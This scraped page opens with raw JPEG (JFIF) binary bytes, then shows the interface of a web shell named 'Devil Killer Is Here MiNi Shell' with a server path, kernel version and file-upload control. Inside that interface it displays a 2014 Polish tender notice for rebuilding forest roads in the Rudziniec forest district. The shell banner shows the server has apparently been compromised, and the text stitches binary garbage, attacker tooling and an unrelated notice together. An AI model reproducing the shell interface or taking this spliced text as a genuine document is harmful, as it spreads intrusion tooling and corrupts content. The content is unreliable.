JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140618/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140618/206106-N-2014.html

<p class="kh_header"><b>Rudziniec: Przebudowa dróg leśnych w Nadleśnictwie Rudziniec
Zn.spr. S-2710-3/2014</b><br>
<b>Numer ogłoszenia: 206106 - 2014; data zamieszczenia: 18.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> PGL LP Nadleśnictwo Rudziniec , ul. Leśna 7, 44-160 Rudziniec, woj. śląskie, tel. 32 300 81 50, faks 32 300 81 60.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka organizacyjna Skarbu Państwa nie posiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa dróg leśnych w Nadleśnictwie Rudziniec
Zn.spr. S-2710-3/2014.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót budowlanych w zakresie przebudowy             
           dróg leśnych wg zestawienia:
           1)  Przebudowa drogi leśnej Nr 62 w leśnictwie Proboszczowice
                 (długość 847mb)  
           2)  Przebudowa drogi leśnej Nr 66 w leśnictwie Proboszczowice
                (długość 1 743 mb)
           3)  Przebudowa drogi leśnej Nr 10A w leśnictwie Kozłów
                (długość 3 257 mb)
           4)  Przebudowa drogi leśnej Nr 10 etap Ia w leśnictwie Ostropa
                (długość 841 mb)
           5)  Przebudowa drogi leśnej do zbiornika p.poż. w leśnictwie Łącza
                (długość 90 mb)
           6)  Przebudowa drogi leśnej Nr 133 w leśnictwie Trachy (odcinek 269 mb)
           7)  Przebudowa drogi leśnej do zbiornika p.poż. w leśnictwie Nogowczyce
                (odcinek 65 mb)
Zamówienie obejmuje: wykonanie robót budowlanych zgodnie z projektami
           i Specyfikacją Techniczną Wykonania i Odbioru Robót a w szczególności:
           - roboty przygotowawcze i ziemne,
           - roboty drogowe (korytowanie, wykonanie podbudowy z kruszywa łamanego -
             dolomit - warstwa dolna, warstwa górna)
           - wykonanie budowli (przepusty)
           - odmulenie i pogłębienie istniejących rowów przydrożnych.

    3.4. Szczególne obowiązki Wykonawcy i wymagania odnośnie sposobu prowadzenia
           prac:
           1) Rozpoznanie miejsca realizacji zamówienia.
                                                                

               Zaleca się, aby przed złożeniem oferty Wykonawca zapoznał się z miejscem
               realizacji zamówienia oraz bezpośrednim otoczeniem terenu realizacji zadania.

           2) Dojazd do miejsca wykonywania robót odbywać się będzie drogami leśnymi
               o ograniczonej nośności. Biorąc powyższe pod uwagę po podpisaniu umowy
               zostanie sporządzony protokół stanu technicznego dróg dojazdowych przed 
               rozpoczęciem i po zakończeniu robót.
               W przypadku pogorszenia stanu technicznego powyższych dróg Wykonawca 
               będzie zobowiązany doprowadzić je stanu pierwotnego na własny koszt.

           3) Roboty winny zostać wykonane i ukończone zgodnie z prawem obowiązującym
               w Rzeczypospolitej Polskiej, w szczególności: Prawem Budowlanym, Prawem 
               Ochrony Środowiska a kierowanie i nadzorowanie robót mogą wykonywać osoby,
               które posiadają wymagane prawem uprawnienia i są ubezpieczone od 
               odpowiedzialności cywilnej.

           4) Zastosowane materiały muszą być wykonane zgodnie z Polskimi Normami
               przenoszącymi europejskie normy zharmonizowane.W przypadku braku
               Polskich Norm przenoszących europejskie normy zharmonizowane uwzględnia się
               wynikające z art. 30 ustawy Pzp.

          5) Wykonawca udziela co najmniej 36 miesięcy gwarancji na wykonany przedmiot
               zamówienia.

          6) Szczegółowy opis przedmiotu zamówienia stanowi dokumentacja projektowa
              wraz ze specyfikacjami technicznymi wykonania i odbioru robót oraz przedmiarem
              opracowana przez: Biuro Projektowe CURSUS PROJEKT Marcin Ludwig
              ul. Spokojna 14, 44-171 Pławniowice.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Droga dojazdowa Łącznik Sieroniowice-Balcarzowice o dł.50m</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 12.1. Oferta musi być zabezpieczona wadium w wysokości:
         36 000,00 zł
         słownie: trzydzieści sześć tysięcy
12.2. Wadium może być wnoszone w jednej lub kilku następujących formach:
       a) pieniądzu: przelewem na rachunek bankowy Zamawiającego:
           BS Gliwice 23 8457 0008 2011 0056 9392 0003 - z informacją na przelewie:
           - wadium przetargowe na zadanie: Przebudowa dróg leśnych w Nadleśnictwie
             Rudziniec.
       b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-
           kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
       c) gwarancjach bankowych;
       d) gwarancjach ubezpieczeniowych,                                                           
       e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2.
           ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju                                            
        Przedsiębiorczości (tekst jedn. Dz.U. z 2007 r. Nr 42, poz. 275 z póz.zm.)
12.3. Wadium należy wnieść przed upływem terminu składania ofert. 
12.4 . Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.
12.5.  Wadium wniesionego w innej formie niż pieniądz (poręczeniach bankowych
          lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że
          poręczenie kasy jest zawsze poręczeniem pieniężnym, gwarancjach bankowych,
          gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty
          o których mowa w art. 6b ust. 5pkt. 2 ustawy z dnia 9.11.2000 r. o utworzeniu
          Polskiej Agencji Rozwoju Przedsiębiorczości) - oryginały dokumentów należy 
          złożyć w kasie Zamawiającego: Nadleśnictwo Rudziniec, 44-160 Rudziniec
          ul. Leśna 7, uzyskując potwierdzenie złożenia, na kserokopii dokumentów.

          Wnoszona przez Wykonawcę ubezpieczeniowa lub bankowa gwarancja
          zapłaty wadium musi mieć charakter samoistny, nieodwołalny, bezwarunkowy
          oraz być płatna na pierwsze żądanie Zamawiającego bez konieczności
          spełniania jakichkolwiek dodatkowych warunków poza oświadczeniem  
          Zamawiającego, iż wystąpiła którakolwiek z okoliczności określonych  
          w pkt. 12.11. i 12.12.
         Zamawiający w szczególności nie dopuszcza możliwości pośrednictwa banku, który
         miałby poświadczać podpisy.  
12..6. Poręczenie lub gwarancja, o którym mowa powyżej powinno być ważne przez okres
          ważności oferty, powinno dotyczyć konkretnego zamówienia i zawierać klauzulę
          o dostępności środków przez Zamawiającego w okresie trwania procedury udzielania
          zamówienia, bez spełnienia jakichkolwiek dodatkowych warunków.
          Wadium uważać się będzie za wniesione wtedy, kiedy znajdować się będzie ono na
          rachunku Zamawiającego lub zostanie zdeponowane  w kasie Zamawiającego.   
12.7.  Wykonawca zobowiązany jest wnieść wadium na okres związania ofertą.
12.8.  Zamawiający  zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze
          oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy
          którego oferta została wybrana jako najkorzystniejsza , z zastrzeżeniem  art. 46 ust. 1 
          ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych
          (tekst jedn. Dz.U. z 2013 r. poz. 907)
                                                           

          Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający
          zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego
          oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia
          żądano.
12.9.   Zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy, który wycofał
           ofertę przed upływem terminu składania ofert.
12.10. Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu 
           zwrócono wadium na podstawie art. 46 ust. 1 ustawy z dnia 29 stycznia 2004 r. 
           Prawo zamówień publicznych (tekst jedn. Dz.U.  z 2013 r. poz. 907 z póz.zm.)
           jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako
           najkorzystniejsza.
          Wykonawca wnosi wadium w terminie określonym przez Wykonawcę.
12.11. Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami 
           wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane,
           pomniejszone  o koszty prowadzenia rachunku bankowego oraz prowizji bankowej
           za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
12.12. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi
           na wezwanie, o którym mowa w art. 26 ust. 3 ustawy z dn. 29 stycznia 2004 r.
           Prawo zamówień publicznych (tekst jedn. Dz.U. z 2013 r. poz. 907), nie złożył
          dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Pzp, lub                                         
          pełnomocnictw, chyba że udowodni, że wynika to z przyczyn niezależnych po jego
          stronie.
12.13. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca którego oferta
           została wybrana:
           a) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach
               określonych w ofercie,
           b) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
           c) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe
             z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy,  którzy nie podlegają 
            wykluczeniu z art. 24 ust. 1 i 2 oraz spełniają warunki dotyczące:
            1) posiadania uprawnień do wykonywania określonej działalności lub czynności,
               jeżeli przepisy prawa nakładają obowiązek ich posiadania,
            2) posiadania wiedzy i doświadczenia,
            3) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi
                do wykonania zamówienia,
            4) sytuacji ekonomicznej i finansowej.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się Wykonawcy, których wiedza i doświadczenie 
                      pozwoli na prawidłowe wykonanie zamówienia, w szczególności o zamówienie
                      mogą ubiegać się Wykonawcy, którzy w okresie ostatnich pięciu lat przed
                      dniem wszczęcia postępowania o zamówienie publiczne a jeżeli okres
                      działalności jest krótszy - w tym okresie wykonywali co najmniej dwie roboty
                      budowlane odpowiadające swoim rodzajem i wartością robotom budowlanym
                      stanowiącym przedmiot zamówienia każda, co winno wynikać z dokumentów
                      w pkt. 9 SIWZ.
                      Jako roboty budowlane odpowiadające swoim rodzajem i wartością robotom
                      budowlanym stanowiącym przedmiot zamówienia, Zamawiający rozumie co 
                      najmniej dwie realizacje dotyczące przebudowy lub budowy dróg o wartości    
                      nie niższej, niż 1 400 000,00 zł każda, przy czym przez wartość robót należy
                      rozumieć kwotę umowną wg zapłaconych faktur.
                      W przypadku inwestycji, których wartość została wyrażona w umowie w innej 
                      walucie niż PLN, należy dokonać przeliczenia tej waluty na PLN, przy
                      zastosowaniu kursów walutowych po przeliczeniu średnim kursem NBP
                       na dzień ukazania się ogłoszenia o zamówieniu w niniejszym postępowaniu
                      (w przypadku inwestycji rozliczanych wyłącznie w walutach innych niż PLN.
                      Jako poświadczenie (inne dokumenty) dotyczące realizacji z ostatnich 5 lat 
                      przed dniem wszczęcia postępowania, Zamawiający uzna takie, które dotyczą 
                      realizacji zadań, których zakończenie miało miejsce nie wcześniej niż
                     5 lat przed dniem składania ofert.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się Wykonawcy którzy dysponują lub będą 
                     dysponować sprzętem budowlanym i środkami transportowymi 
                     niezbędnymi do wykonywania robót.
                     Wymagane jest posiadanie co najmniej dwóch koparek o pojemności łyżki nie 
                     mniej niż 0,6 m3, trzech walców, co najmniej 5 samochodów ciężarowych
                     samowyładowczych o tonażu co najmniej 15 t, dwóch spycharek o mocy
                    55 kW (75 KM), jednego rozściełacza o szerokości rozkładania do 6,5 m.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się wykonawcy, którzy:
                      dysponują osobami zdolnymi do wykonania zamówienia tj. wykażą co najmniej
                      jedną osobę posiadającą uprawnienia do pełnienia funkcji kierownika budowy
                      w rozumieniu ustawy Prawo budowlane, posiadającą wykształcenie wyższe 
                      i uprawnienia budowlane do kierowania robotami budowlanymi drogowymi bez 
                      ograniczeń lub odpowiadające im uprawnienia budowlane wydane na podstawie 
                      wcześniej obowiązujących przepisów oraz posiadającą co najmniej 2 letnie
                      doświadczenie  na stanowisku kierownika budowy przy realizacji robót 
                      budowlanych drogowych związanych z budową i/lub przebudową dróg lub
                      przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia osób 
                      zdolnych do wykonania zamówienia. Kierownik budowy powinien posiadać
                      uprawnienia budowlane zgodnie z ustawą z dnia 07 lipca 1994 r. Prawo
                      budowlane (tekst jedn.Dz.U. z 2010 r. Nr 243, poz. 1623 z póz.zm.) oraz 
                     Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. 

                                                                 -  4  -

                      w sprawie samodzielnych funkcji technicznych w budownictwie
                      (tekst jednolity Dz.U. Nr 83, poz. 578 z póz.zm.) lub odpowiadające im ważne 
                      uprawnienia budowlane, które zostały wydane na podstawie wcześniej 
                      obowiązujących przepisów.
                      Wykonawca może polegać na potencjale technicznym innych podmiotów, 
                      niezależnie od charakteru prawnego łączących go z nimi stosunków. 
                      Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, 
                      iż będzie dysponował zasobami niezbędnymi do wykonania zamówienia, w     
                      szczególności przedstawiając w tym celu pisemne zobowiązanie tych 
                      podmiotów  do oddania mu do dyspozycji niezbędnych zasobów na okres 
                      korzystania z nich przy wykonywaniu zamówienia.                  
                      przy wykonywaniu zamówienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się wykonawcy, których sytuacja ekonomiczna 
           i finansowa pozwoli na wykonanie zamówienia, w szczególności o zamówienie
           mogą ubiegać się wykonawcy, którzy:
            8.2.2. przedstawią informację z banku lub spółdzielczej kasy oszczędnościowo-
                      kredytowej, w których posiadają rachunek, potwierdzającą wysokość
                      posiadanych środków finansowych lub zdolność kredytową w wysokości 
                      nie mniejszej niż 1 400 000,00 zł,
            8.2.3. są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej
                      działalności gospodarczej na kwotę co najmniej 1 400 000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>9.4.1. kosztorys ofertowy w formie szczegółowej lub uproszczonej w oparciu o 
                    załączony przedmiar robót, dokumentację projektową i specyfikację techniczną
                    wykonania i odbioru robót budowlanych, który winien być zgodny wartościowo
                    z wynagrodzeniem zaoferowanym przez Wykonawcę, w ramach oferty i winien
                    ujmować koszty wszystkich pozycji przedmiarowych i prac wynikających
                    z dokumentacji projektowej.
          9.4.2. Zaparafowany na dowód akceptacji przez osobę(osoby) upoważnioną 
                    do reprezentacji Wykonawcy projekt umowy.
          9.4.3. W sytuacji gdy Wykonawca polega na wiedzy i doświadczeniu, potencjale
